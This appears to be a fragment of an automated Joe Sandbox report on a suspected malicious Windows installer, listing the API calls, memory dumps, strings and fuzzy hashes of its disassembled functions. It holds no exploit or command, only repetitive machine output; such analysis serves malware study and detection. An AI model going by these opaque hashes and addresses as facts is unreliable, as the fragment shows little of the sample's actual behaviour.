                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstance
                                                                                                      • String ID: C:\Users\user\AppData\Local\Iw\Unnumberable
                                                                                                      • API String ID: 542301482-3164773890
                                                                                                      • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                      • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                      • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                      • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst
                                                                                                      • String ID:
                                                                                                      • API String ID: 1974802433-0
                                                                                                      • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                      • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                      • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                      • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                      APIs
                                                                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
                                                                                                      • GetSysColor.USER32(?), ref: 004045FE
                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                      • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                      • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                      • SetCursor.USER32(00000000), ref: 00404720
                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                      • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                      • String ID: Call$N
                                                                                                      • API String ID: 3103080414-3438112850
                                                                                                      • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                      • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                      • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                      • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                      APIs
                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                      • String ID: F
                                                                                                      • API String ID: 941294808-1304234792
                                                                                                      • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                      • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                      • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                      • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                      • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                      • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                      • wsprintfA.USER32 ref: 004060B3
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                      • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00405EE2
                                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                      • API String ID: 2171350718-461813615
                                                                                                      • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                      • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                      • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                      • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                      APIs
                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                      • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                      • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                      • GetSysColor.USER32(?), ref: 0040444C
                                                                                                      • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                      • DeleteObject.GDI32(?), ref: 00404476
                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2320649405-0
                                                                                                      • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                      • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                      • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                      • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                      • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                      • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                      • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 2531174081-0
                                                                                                      • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                      • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                      • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                      • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                      APIs
                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$Next$Prev
                                                                                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                      • API String ID: 589700163-1201062745
                                                                                                      • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                      • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                      • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                      • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                      APIs
                                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                      • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                      • wsprintfW.USER32 ref: 00402EF5
                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                        • Part of subcall function 00402E72: MulDiv.KERNEL32(00017969,00000064,00017ED2), ref: 00402E87
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                      • String ID: ... %d%%
                                                                                                      • API String ID: 722711167-2449383134
                                                                                                      • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                      • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                      • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                      • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                      • GetMessagePos.USER32 ref: 00404D3D
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                      • String ID: f
                                                                                                      • API String ID: 41195575-1993550816
                                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                      • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                      • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                      APIs
                                                                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                      • wsprintfW.USER32 ref: 00402E45
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                      • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                      • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                      • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                      • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                      APIs
                                                                                                        • Part of subcall function 6F94121B: GlobalAlloc.KERNEL32(00000040,?,6F94123B,?,6F9412DF,00000019,6F9411BE,-000000A0), ref: 6F941225
                                                                                                      • GlobalFree.KERNEL32(?), ref: 6F942657
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F94268C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$Free$Alloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1780285237-0
                                                                                                      • Opcode ID: c3d0c9bd4fd0d3467daf234b85dec31dcf1e94502136da98e910c887a3c1166d
                                                                                                      • Instruction ID: bb55c8e11ae62a3454f6565a5c6cbeb56c54cc1c839ff097b360dac0b51605c6
                                                                                                      • Opcode Fuzzy Hash: c3d0c9bd4fd0d3467daf234b85dec31dcf1e94502136da98e910c887a3c1166d
